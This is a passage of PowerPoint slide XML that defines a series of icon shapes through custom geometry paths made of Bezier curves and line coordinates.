                  <a:pt x="8928" y="21062"/>
                  <a:pt x="9117" y="20938"/>
                  <a:pt x="9189" y="20737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1" y="20618"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11412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5" y="20959"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10191" y="21229"/>
                  <a:pt x="10382" y="21474"/>
                  <a:pt x="10650" y="21507"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10984" y="21549"/>
                  <a:pt x="11337" y="21580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4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1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4"/>
                  <a:pt x="5867" y="18484"/>
                  <a:pt x="5997" y="18834"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6070" y="19033"/>
                  <a:pt x="6257" y="19155"/>
                  <a:pt x="6456" y="19155"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6512" y="19155"/>
                  <a:pt x="6570" y="19145"/>
                  <a:pt x="6626" y="19124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6880" y="19030"/>
                  <a:pt x="7009" y="18748"/>
                  <a:pt x="6915" y="18493"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6849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7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1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4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4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6" name="Shape 2936"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2023561" y="329589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5" y="9818"/>
                  <a:pt x="10800" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11715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5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5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7" name="Shape 2937"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="32958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5" y="6634"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12189" y="12188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6635" y="14966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9411" y="9412"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9411" y="9412"/>
                  <a:pt x="14965" y="6634"/>
                  <a:pt x="14965" y="6634"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4552" y="17048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8"/>
                  <a:pt x="4552" y="17048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8" name="Shape 2938"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="32958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2" y="1990"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21244" y="1983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14371" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14369" y="27"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14326" y="14"/>
                  <a:pt x="14284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1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4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2" y="19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39" name="Shape 2939"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="32958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5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4"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17606" y="11910"/>
                  <a:pt x="17591" y="12201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6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2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4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4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2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2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1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1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14236" y="19656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20975" y="21581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6"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5432" y="10394"/>
                  <a:pt x="5153" y="10605"/>
                  <a:pt x="4909" y="10825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49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8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8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5"/>
                  <a:pt x="4469" y="13745"/>
                  <a:pt x="3927" y="13745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3385" y="13745"/>
                  <a:pt x="2945" y="14185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0" name="Shape 2940"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="32958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19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10800" y="0"/>
                  <a:pt x="1080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1" name="Shape 2941"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="329589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3"/>
                  <a:pt x="17649" y="11291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20594" y="11291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20345" y="16319"/>
                  <a:pt x="16320" y="20344"/>
                  <a:pt x="11291" y="20593"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11291" y="13205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6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="16666"/>
                  <a:pt x="11291" y="13205"/>
                  <a:pt x="11291" y="13205"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11291" y="4934"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12233" y="5012"/>
                  <a:pt x="13111" y="5315"/>
                  <a:pt x="13875" y="5784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13793" y="5967"/>
                  <a:pt x="13745" y="6168"/>
                  <a:pt x="13745" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="7195"/>
                  <a:pt x="14405" y="7855"/>
                  <a:pt x="15218" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15432" y="7855"/>
                  <a:pt x="15633" y="7807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5"/>
                  <a:pt x="16534" y="7031"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16631" y="6835"/>
                  <a:pt x="16691" y="6616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8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6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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="13205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19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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="17651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2" name="Shape 2942"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5172341" y="329589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89"/>
                  <a:pt x="10534" y="12360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8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8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0"/>
                  <a:pt x="4010" y="13230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4941" y="13483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3" name="Shape 2943"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705602" y="3295894"/>
            <a:ext cx="228541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6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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18100" y="7364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21514" y="2707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21506" y="2703"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21560" y="2629"/>
                  <a:pt x="21600" y="2547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0"/>
                  <a:pt x="21514" y="1202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4" name="Shape 2944"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251560" y="32893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5" name="Shape 2945"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784821" y="32893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2"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17614" y="6914"/>
                  <a:pt x="17383" y="5576"/>
                  <a:pt x="17008" y="4408"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17543" y="4130"/>
                  <a:pt x="18018" y="3797"/>
                  <a:pt x="18435" y="3427"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19673" y="4722"/>
                  <a:pt x="20474" y="6437"/>
                  <a:pt x="20593" y="8342"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20593" y="8342"/>
                  <a:pt x="17658" y="8342"/>
                  <a:pt x="17658" y="8342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6"/>
                  <a:pt x="17056" y="3275"/>
                  <a:pt x="16666" y="3486"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16337" y="2707"/>
                  <a:pt x="15939" y="2026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7" y="3044"/>
                  <a:pt x="8086" y="2983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7991" y="2912"/>
                  <a:pt x="7892" y="2844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1" y="3040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10712" y="1983"/>
                  <a:pt x="11449" y="1263"/>
                  <a:pt x="12269" y="1056"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12269" y="3575"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12608" y="3701"/>
                  <a:pt x="12938" y="3844"/>
                  <a:pt x="13258" y="4006"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13258" y="1056"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14282" y="1315"/>
                  <a:pt x="15181" y="2363"/>
                  <a:pt x="15801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0" y="6009"/>
                  <a:pt x="16526" y="6670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17157" y="7466"/>
                  <a:pt x="17663" y="8363"/>
                  <a:pt x="18025" y="9331"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20593" y="9331"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20478" y="11173"/>
                  <a:pt x="19721" y="12834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4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69"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13687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69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16666" y="12269"/>
                  <a:pt x="13731" y="12269"/>
                  <a:pt x="13731" y="12269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4"/>
                  <a:pt x="13687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8"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12012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4"/>
                  <a:pt x="12378" y="19814"/>
                  <a:pt x="11558" y="20118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49" y="13258"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12709" y="14550"/>
                  <a:pt x="12510" y="15752"/>
                  <a:pt x="12195" y="16799"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11327" y="16471"/>
                  <a:pt x="10357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7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49" y="12269"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9331" y="12269"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9331" y="12269"/>
                  <a:pt x="9331" y="9305"/>
                  <a:pt x="9331" y="9305"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9331" y="4983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3"/>
                  <a:pt x="9331" y="4983"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13796" y="6696"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13485" y="6963"/>
                  <a:pt x="13129" y="7203"/>
                  <a:pt x="12738" y="7413"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12409" y="6634"/>
                  <a:pt x="12012" y="5954"/>
                  <a:pt x="11557" y="5410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12378" y="5714"/>
                  <a:pt x="13131" y="6153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9" y="7810"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6419" y="6290"/>
                  <a:pt x="7318" y="5242"/>
                  <a:pt x="8342" y="4983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8342" y="4983"/>
                  <a:pt x="8342" y="8323"/>
                  <a:pt x="8342" y="8323"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8342" y="12269"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4923" y="12269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69"/>
                  <a:pt x="8342" y="12269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0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9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4" y="18325"/>
                  <a:pt x="4935" y="18114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5264" y="18893"/>
                  <a:pt x="5661" y="19574"/>
                  <a:pt x="6115" y="20118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5295" y="19814"/>
                  <a:pt x="4541" y="19374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4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7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69"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1007" y="12269"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1126" y="10365"/>
                  <a:pt x="1927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4" y="6634"/>
                  <a:pt x="4935" y="7413"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4544" y="7203"/>
                  <a:pt x="4188" y="6963"/>
                  <a:pt x="3877" y="6696"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4542" y="6153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6" y="3927"/>
                  <a:pt x="0" y="7883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6" name="Shape 2946"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082" y="32893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5" y="9980"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19587" y="9894"/>
                  <a:pt x="19575" y="9811"/>
                  <a:pt x="19565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3" y="9078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4" y="8195"/>
                  <a:pt x="19218" y="8116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19143" y="7879"/>
                  <a:pt x="19057" y="7646"/>
                  <a:pt x="18963" y="7418"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18923" y="7321"/>
                  <a:pt x="18876" y="7229"/>
                  <a:pt x="18833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80" y="6618"/>
                  <a:pt x="18516" y="6504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49"/>
                  <a:pt x="18031" y="5731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17986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9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40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4" y="4970"/>
                  <a:pt x="13469" y="5860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13715" y="6750"/>
                  <a:pt x="14126" y="6943"/>
                  <a:pt x="15341" y="6443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15862" y="6228"/>
                  <a:pt x="16258" y="6340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1" y="13153"/>
                  <a:pt x="19380" y="12917"/>
                  <a:pt x="19432" y="12677"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19452" y="12587"/>
                  <a:pt x="19467" y="12494"/>
                  <a:pt x="19484" y="12402"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19517" y="12224"/>
                  <a:pt x="19545" y="12044"/>
                  <a:pt x="19566" y="11862"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19576" y="11776"/>
                  <a:pt x="19588" y="11691"/>
                  <a:pt x="19596" y="11604"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19620" y="11340"/>
                  <a:pt x="19636" y="11072"/>
                  <a:pt x="19636" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="10523"/>
                  <a:pt x="19620" y="10250"/>
                  <a:pt x="19595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8" y="5277"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6373" y="5176"/>
                  <a:pt x="5613" y="4605"/>
                  <a:pt x="5110" y="4044"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4094" y="4900"/>
                  <a:pt x="3277" y="5982"/>
                  <a:pt x="2729" y="7212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2875" y="8862"/>
                  <a:pt x="3774" y="9726"/>
                  <a:pt x="3774" y="9726"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3774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90" y="10923"/>
                  <a:pt x="5615" y="10156"/>
                  <a:pt x="6382" y="9757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7149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6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9" y="12656"/>
                  <a:pt x="16246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40" y="11966"/>
                  <a:pt x="7977" y="13807"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8315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5" y="18286"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9880" y="18624"/>
                  <a:pt x="10524" y="19606"/>
                  <a:pt x="10769" y="18225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11015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7" name="Shape 2947"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343" y="32893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6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10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3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0" y="12824"/>
                  <a:pt x="11304" y="12785"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11304" y="15605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5"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11304" y="8815"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11890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8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5"/>
                  <a:pt x="13529" y="7227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13410" y="6960"/>
                  <a:pt x="13280" y="6708"/>
                  <a:pt x="13136" y="6480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13407" y="6627"/>
                  <a:pt x="13656" y="6805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6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8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5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5"/>
                  <a:pt x="10296" y="15605"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7707" y="14602"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7819" y="14521"/>
                  <a:pt x="7941" y="14445"/>
                  <a:pt x="8071" y="14374"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8190" y="14641"/>
                  <a:pt x="8321" y="14892"/>
                  <a:pt x="8464" y="15120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8193" y="14973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6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0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8321" y="6708"/>
                  <a:pt x="8190" y="6960"/>
                  <a:pt x="8071" y="7227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7941" y="7155"/>
                  <a:pt x="7819" y="7079"/>
                  <a:pt x="7707" y="6998"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7944" y="6805"/>
                  <a:pt x="8193" y="6627"/>
                  <a:pt x="8464" y="6480"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="4909"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7546" y="4909"/>
                  <a:pt x="4909" y="7546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6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5"/>
                  <a:pt x="626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cubicBezTo>
                  <a:pt x="0" y="627"/>
                  <a:pt x="55" y="749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49"/>
                  <a:pt x="21600" y="627"/>
                  <a:pt x="21600" y="491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="220"/>
                  <a:pt x="21380" y="0"/>
                  <a:pt x="21109" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20974" y="0"/>
                  <a:pt x="20851" y="55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8" name="Shape 2948"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8422694" y="3289337"/>
            <a:ext cx="20314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3" y="7721"/>
                  <a:pt x="8899" y="7354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8384" y="6987"/>
                  <a:pt x="7819" y="6529"/>
                  <a:pt x="8462" y="6291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9104" y="6052"/>
                  <a:pt x="9285" y="6071"/>
                  <a:pt x="9439" y="6511"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9594" y="6950"/>
                  <a:pt x="10108" y="6694"/>
                  <a:pt x="10159" y="6273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10211" y="5851"/>
                  <a:pt x="11163" y="5411"/>
                  <a:pt x="11806" y="5209"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12449" y="5007"/>
                  <a:pt x="13040" y="4934"/>
                  <a:pt x="12963" y="4585"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12886" y="4237"/>
                  <a:pt x="12706" y="3980"/>
                  <a:pt x="11703" y="3980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10699" y="3980"/>
                  <a:pt x="11137" y="4934"/>
                  <a:pt x="10314" y="4365"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9491" y="3797"/>
                  <a:pt x="10493" y="3944"/>
                  <a:pt x="10905" y="3816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11317" y="3687"/>
                  <a:pt x="11729" y="3155"/>
                  <a:pt x="11009" y="3119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10287" y="3082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7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0"/>
                  <a:pt x="20124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5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7" y="405"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3895" y="403"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1505" y="2016"/>
                  <a:pt x="0" y="4314"/>
                  <a:pt x="0" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="11587"/>
                  <a:pt x="5081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2" y="20618"/>
                  <a:pt x="6750" y="20838"/>
                  <a:pt x="6750" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6750" y="21380"/>
                  <a:pt x="7052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4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7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7"/>
                  <a:pt x="17369" y="0"/>
                  <a:pt x="12150" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6931" y="0"/>
                  <a:pt x="2700" y="3077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2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4" y="11388"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11315" y="11501"/>
                  <a:pt x="11532" y="11731"/>
                  <a:pt x="11738" y="11767"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11768" y="11768"/>
                  <a:pt x="11798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4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13606" y="9261"/>
                  <a:pt x="14070" y="8729"/>
                  <a:pt x="13195" y="8197"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12320" y="7666"/>
                  <a:pt x="12423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0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7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16591" y="5246"/>
                  <a:pt x="15858" y="5217"/>
                  <a:pt x="16411" y="6309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16745" y="6969"/>
                  <a:pt x="17568" y="7226"/>
                  <a:pt x="17877" y="7739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17984" y="7918"/>
                  <a:pt x="18288" y="8083"/>
                  <a:pt x="18633" y="8228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18803" y="7797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4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14328" y="2411"/>
                  <a:pt x="14192" y="2545"/>
                  <a:pt x="14044" y="2605"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13684" y="2752"/>
                  <a:pt x="13710" y="3339"/>
                  <a:pt x="14404" y="328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49" name="Shape 2949"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8943258" y="3289337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6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8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2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0" name="Shape 2950"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476519" y="3289337"/>
            <a:ext cx="228541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1" name="Shape 2951"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984387" y="3314730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3"/>
                  <a:pt x="9957" y="1783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4"/>
                  <a:pt x="11617" y="1719"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11641" y="1792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0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4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2" name="Shape 2952"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648" y="32893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3" name="Shape 2953"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="3289337"/>
            <a:ext cx="279328" cy="2793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2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1"/>
                  <a:pt x="15218" y="7008"/>
                  <a:pt x="15218" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="6738"/>
                  <a:pt x="15163" y="6614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5" name="Shape 2955"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="46392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1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1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59" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15468" y="15851"/>
                  <a:pt x="15468" y="16163"/>
                  <a:pt x="15659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3" y="17743"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2972" y="17934"/>
                  <a:pt x="2972" y="18245"/>
                  <a:pt x="3163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1" y="16354"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6132" y="16163"/>
                  <a:pt x="6132" y="15851"/>
                  <a:pt x="5941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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15851" y="6132"/>
                  <a:pt x="16162" y="6132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2"/>
                  <a:pt x="5749" y="6132"/>
                  <a:pt x="5941" y="5941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1"/>
                  <a:pt x="5246" y="5941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6" name="Shape 2956"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="46392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299"/>
                  <a:pt x="7419" y="18422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5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2"/>
                  <a:pt x="14236" y="18299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0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59" y="5247"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15468" y="5437"/>
                  <a:pt x="15468" y="5749"/>
                  <a:pt x="15659" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15851" y="6132"/>
                  <a:pt x="16162" y="6132"/>
                  <a:pt x="16354" y="5940"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="5246" y="5940"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5438" y="6132"/>
                  <a:pt x="5749" y="6132"/>
                  <a:pt x="5941" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6132" y="5749"/>
                  <a:pt x="6132" y="5437"/>
                  <a:pt x="5941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3" y="3163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2972" y="3355"/>
                  <a:pt x="2972" y="3666"/>
                  <a:pt x="3163" y="3857"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3163" y="3857"/>
                  <a:pt x="5246" y="5940"/>
                  <a:pt x="5246" y="5940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7" name="Shape 2957"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="46392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9" y="55"/>
                  <a:pt x="10935" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10665" y="0"/>
                  <a:pt x="10542" y="55"/>
                  <a:pt x="10452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0"/>
                  <a:pt x="5749" y="15950"/>
                  <a:pt x="5941" y="15759"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6132" y="15567"/>
                  <a:pt x="6132" y="15256"/>
                  <a:pt x="5941" y="15064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3" y="12981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2971" y="13173"/>
                  <a:pt x="2971" y="13484"/>
                  <a:pt x="3163" y="13675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3163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8" y="13484"/>
                  <a:pt x="18628" y="13173"/>
                  <a:pt x="18437" y="12981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18245" y="12790"/>
                  <a:pt x="17934" y="12790"/>
                  <a:pt x="17742" y="12981"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15659" y="15064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0"/>
                  <a:pt x="16162" y="15950"/>
                  <a:pt x="16354" y="15759"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="5891" y="20618"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="17907"/>
                  <a:pt x="8089" y="15709"/>
                  <a:pt x="10800" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13511" y="15709"/>
                  <a:pt x="15709" y="17907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8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8"/>
                  <a:pt x="21380" y="20618"/>
                  <a:pt x="21109" y="206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8" name="Shape 2958"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="46392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6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8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6" y="1870"/>
                  <a:pt x="9794" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4302" y="514"/>
                  <a:pt x="0" y="5140"/>
                  <a:pt x="0" y="10777"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16755"/>
                  <a:pt x="4836" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14176" y="21600"/>
                  <a:pt x="17656" y="20045"/>
                  <a:pt x="19636" y="17613"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19305" y="17644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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="11737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16869" y="12629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16334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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18208" y="11737"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18208" y="11737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8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13299" y="6828"/>
                </a:lnTo>
                <a:lnTo>
